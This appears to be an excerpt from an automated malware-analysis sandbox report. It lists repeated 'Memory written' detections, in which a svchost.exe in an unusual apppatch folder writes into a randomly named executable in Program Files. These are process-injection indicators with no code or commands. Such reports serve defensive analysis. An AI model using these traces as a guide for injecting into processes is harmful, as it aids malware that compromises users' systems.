      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F42000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F94000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D51000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CB0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CB1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CB2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D04000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2FB0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2FB1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2FB2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3004000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2340000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2341000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2342000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2394000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2534000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FF0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FF1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FF2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1044000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E04000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2550000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2551000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2552000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 25A4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2490000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2491000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2492000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2920000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2921000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2922000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2974000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1330000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1331000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1332000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1384000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 950000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 951000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 952000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E41000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E42000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E94000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2AF0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2AF1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2AF2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B44000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C10000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C11000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C12000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C64000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 6B0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 6B1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 6B2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 704000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C44000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2820000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2821000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2822000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2874000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D51000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D52000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F41000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F42000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F94000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2730000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2731000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2732000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2784000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D70000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D71000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D72000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DC4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1050000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1051000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1052000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 10A4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2910000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2911000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2912000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2964000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: EE0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: EE1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: EE2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F34000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B70000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B71000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B72000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BC4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3030000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3031000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3032000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3084000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2860000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2861000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2862000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 28B4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D90000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D91000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D92000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DE4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA0000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA1000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA2000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DF4000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 800000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 801000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 802000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 854000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C00000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C01000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C02000Jump to behavior
      Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C54000Jump to behavior
